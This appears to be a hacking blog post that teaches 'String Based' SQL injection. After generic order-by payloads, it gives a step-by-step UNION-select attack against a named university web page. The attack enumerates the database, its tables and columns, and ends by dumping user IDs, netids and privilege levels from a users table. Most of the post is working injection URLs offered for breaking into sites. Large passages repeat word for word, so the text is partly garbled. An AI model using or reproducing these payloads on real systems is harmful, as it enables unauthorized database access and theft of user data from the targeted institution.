What
is String Based SQL injection?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this Problem:
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+-
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the +- sign in our query
Code:
id=X' order by Y --+-
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we.
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this Problem:
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+-
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the +- sign in our query
Code:
id=X' order by Y --+-
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we.
ads
String Based SQL injection
1. Getting Column Number:
http://www.humanrights.uconn.edu/publications.php?id=19' order by 6--+-
2. Getting Vulnerable Column Number:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,4,5,6--+-3.
3. Getting Version, Database, User :
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,group_concat(database()),concat(user(),0x3a,version()),5,6--+-
4. Getting Table Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-
5. Getting Column Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)--+-
6. Getting Data From Column Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(id,0x3e,netid,0x3e,privelage),5,6 from homepageusers--+-
Results will display the data given by the columns you have chosen.
2. Getting Vulnerable Column Number:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,4,5,6--+-3.
3. Getting Version, Database, User :
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,group_concat(database()),concat(user(),0x3a,version()),5,6--+-
4. Getting Table Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-
5. Getting Column Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)--+-
6. Getting Data From Column Name:
http://www.humanrights.uconn.edu/publications.php?id=-19' union select 1,2,3,group_concat(id,0x3e,netid,0x3e,privelage),5,6 from homepageusers--+-
Results will display the data given by the columns you have chosen.
No comments:
Post a Comment